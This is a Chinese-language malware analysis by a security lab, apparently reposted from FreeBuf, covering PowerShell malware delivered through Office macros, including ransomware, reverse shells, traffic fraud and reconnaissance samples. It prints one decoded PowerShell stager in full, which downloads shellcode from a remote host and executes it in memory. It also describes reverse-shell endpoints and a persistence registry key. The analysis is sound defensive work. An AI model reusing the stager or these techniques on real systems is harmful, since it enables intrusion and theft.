转自freebuf引言人在做,天在看。 技术从来都是中性的,被用来行善还是作恶完全取决于运用它的人。原子能可以用来发电为大众提供清洁能源,也可以用来制造能毁灭全人类的核武器,这不是一个完善的世界,于是我们既有核电站也有了核武器。 Powershell,曾经Windows系统管理员的称手工具,在恶意代码制造和传播者手里也被玩得花样百出。由于Powershell的可执行框架部分是系统的组件不可能被查杀,而驱动它的脚本是非PE的而非常难以通过静态方法判定恶意性,同时脚本可以非常小巧而在系统底层的支持下功能却可以非常强大,这使利用Powershell的恶意代码绕过常规的病毒防护对系统为所欲为。因此,360天眼实验室近期看到此类恶意代码泛滥成灾就毫不奇怪,事实上,我们甚至看到所跟踪的APT团伙也开始转向Powershell。 本文我们向大家展示一些看到的实际恶意代码的例子。 实例分析这里我们基于360威胁情报中心的数据,对接触到的Powershell恶意代码按分类各举一例。 勒索软件我们知道现在勒索软件以其直接的变现方式现在已成为黑产的宠儿,像雨后春笋那样冒出来的勒索软件中,我们看到了使用纯Powershell脚本实现的例子。
这是一个通过Word文档中嵌入宏以诱导执行的勒索软件,使用工具提取出其中的宏,内容如下:
宏的功能是下载http:///file.php到本地的temp目录下,并用Powershell运行这个文件。而下载回来的file.php本质上是一个ps的脚本文件,MD5为:dd180477d6a0bb6ce3c29344546ebdfc 。 勒索者脚本的实现原理是:通过随机生成加密密钥与用户ID,将加密密钥与用户ID信息上传到服务器进行备份,在用户机器上使用对称算法将用户的文档进行加密。因为密钥为随机生成,除非拥有攻击者服务器上备份的密钥,否则很难将被加密的文档进行还原。 脚本的原貌为: 可见,脚本做了混淆处理,简单处理以后归纳出的脚本主要执行过程如下: 1. 生成三个随机数,分别表示加密密钥、加密用的盐、UUID 把上面生成随机数发送到服务器中保存 2. 用随机数生成加密容器 3. 得到磁盘中的所有的指定后缀的文件 调用Get-PSDrive,得到所有文件名
4. 加密这些文件的前2048个字节后写回文件 5. 解码Base64得到提示勒索的html文件 在html文件的尾部添加上赎回密钥用的UUID及当前时间 渗透测试此类样本大多使用网络上的nishang开源工具包生成的攻击文件。攻击文件以Word、Excel、CHM、LNK等格式的文件为载体,嵌入Payload,实现获得反弹Shell等功能,实现对系统的控制。
文件打开后,会显示文件损坏,用来迷惑用户,Word中的宏却悄然运行了。 宏的内容为:
将宏中的字符串,用Base64解码后,得到内容如下:
将其中的shellcode提取出来进行分析得知,这段shellcode的主要功能是反向连接内网IP 192.168.1.30的4444端口。 另一个与上述样本有着类似功能的样本的MD5为:1e39753fd56f17010ac62b1d84b5e650 从文件中提取出来的宏为: 而这四个函数对应的功能分别为 Execute: 用Powershell下载invoke-shellcode.ps后,通过invoke-shellcode函数调用指定Payload windows/meterpreter/reverse_https 建立反弹shell,反弹的地址为98.100.108.133,端口为443 其中部分代码为: Persist: 将Powershell建立反弹Shell的功能用VBS实现后,保存在C:\Users\Public\10-D.vbs文件中 Reg 新建HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load注册表,值指定为C:\Users\Public\10-D.vbs Start 调用C:\Users\Public\10-D.vbs 而有时,为了抵抗杀毒软件的追杀,样本通常会进行Base64编码。
下面为提取出来的宏内容,可见代码使用了Base64编码:
解码后的内容为: $q = @” [DllImport(“kernel32.dll”)] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport(“kernel32.dll”)] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpP arameter, uint dwCreationFlags, IntPtr lpThreadId); “@ try{$d = “ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789”.ToCharArray() function c($v){ return (([int[]] $v.ToCharArray() | Measure-Object -Sum).Sum % 0x100 -eq 92)} function t {$f = “”;1..3|foreach-object{$f+= $d[(get-random -maximum $d.Length)]};return $f;} function e { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}} function g{ for ($i=0;$i -lt 64;$i++){$h = t;$k = $d | e; foreach ($l in $k){$s = $h + $l; if (c($s)) { return $s }}}return “9vXU”;} [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$m = New-Object System.Net.WebClient; $m.Headers.Add(“user-agent”, “Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)”);$n = g; [Byte[]] $p = $m.DownloadData(“https://192.168.0.105:4444/$n ” ) $o = Add-Type -memberDefinition $q -Name “Win32” -namespace Win32Functions -passthru $x=$o::VirtualAlloc(0,$p.Length,0x3000,0x40);[System.Runtime.InteropServices.Marshal]::Copy($p, 0, [IntPtr]($x.ToInt32()), $p.Length) $o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{} 脚本的功能是通过g函数随机生成四位的字符,从内网网址下载后加载执行https://192.168.0.105:4444/xxxx (其中xxxx为随机四位字符) 这里连接的是192.168.0.105为内网IP,此样本很可能是渗透者进行内网渗透攻击的测试样本。此类样本还有很多: eae0906f98568c5fb25b2bb32b1dbed7 1a42671ce3b2701956ba49718c9e118e 496ed16e636203fa0eadbcdc182b0e85 使用LNK文件,建立反弹shell的样本 流量欺骗为了快速提升网站流量、Alexa排名、淘宝网店访问量、博客人气、每日访问IP、PV、UV等,有些网站站长会采取非常规的引流方法,采用软件在后台模拟人正常访问网页的点击动作而达到提升流量的目的。
文档打开后里面只有“test by c”这几个文字 提取出文档中的宏中的加密字符解密后得到可读的ps脚本如下
可见,ps脚本的主要功能就是执行Shellcode,这段Shellcode的功能就是调用wininet.dll中的函数进行连接138.128.196.84地址的443端口。而138.128.196.84地址正为流量宝类的软件用的地址。 探测控制样本对通过宏调用Powershell下载PE文件在受影响的系统上检查是否为关心的目标并执行进一步地操作,具备针对性攻击的特点。 样本MD5:fba6b329876533f28d317e60fe53c8d3 从样本中抽取出的宏主要是根据系统版本下载相应的文件执行
其中的对应32位系统的cache文件的内容如下: 我们对Shellcode进行简单分析: 1. 在内存中解密,生成一个PE文件,在内存中展开跳到入口点处执行,将PE文件的.BSS区段进行解码,解码算法如下: 解密后的结果为: 2.判断是不是64位系统 判断虚拟机 3. 用FindFirstUrlCacheEntry和FindNextUrlCacheEntry遍历IE临时文件目录 ,用于判断用户是否是攻击者的目标用户 4.计算用户和电脑信息的HASH 随后B03938处创建线程进行下面的动作 判断ipconfig -all 命令中是否有.edu、school、hospital、colledge、health、nurse等字符串 调用cmd /C “”ipconfig -all > C:\DOCUME~1\yyyyy\LOCALS~1\Temp\xxxx.TMP(xxx代表随机数)生成文件,检测.edu、school、hospital、colledge、health、nurse等字符串 5. 遍历系统中的进程,检测有否指定hash的进程正在运行, 从IE缓存中查找用户是不是访问过这些网址: 通过WININET.FindFirstUrlCacheEntryW WININET.FindNextUrlCacheEntryW WININET.FindCloseUrlCache 得到net view命令返回值中是否有pos、store、shop、sale等字符串 发送用户信息,并下载相对应的恶意程序: 其中,用这种手法的恶意样本还有如下: 信息搜集样本中的宏代码下载执行信息收集类的Powershell脚本,很可能是某些针对性攻击的前导。 样本MD5:f7c3c7df2e7761eceff991bf457ed5b9 提取出来的宏代码为: 下载一个名为Get-Info-2.ps1的脚本,脚本功能是将本机的IP地址、domainname、username、usbid等发送到远端服务器中。 总结天眼实验室再次提醒用户,此类恶意软件主要依赖通过微软的Office文档传播,用户应该确保宏不默认启用,提防任何来自不受信任来源的文件,当打开文件系统提示要使用宏时务必慎重。同时要尽量选用可靠的安全软件进行防范,如无必要不要关闭安全软件,当发现系统出现异常情况,应及时查杀木马,尽可能避免各类恶意代码的骚扰。 参考资料* 作者:360天眼实验室(企业账号),转载请注明来自FreeBuf黑客与极客(FreeBuf.COM) 本文链接: http://www./the-variety-of-powershell-malice-code.html 请尊重原作者和编辑的辛勤劳动,欢迎转载,并注明出处! 暂时没有相关文章。 |
|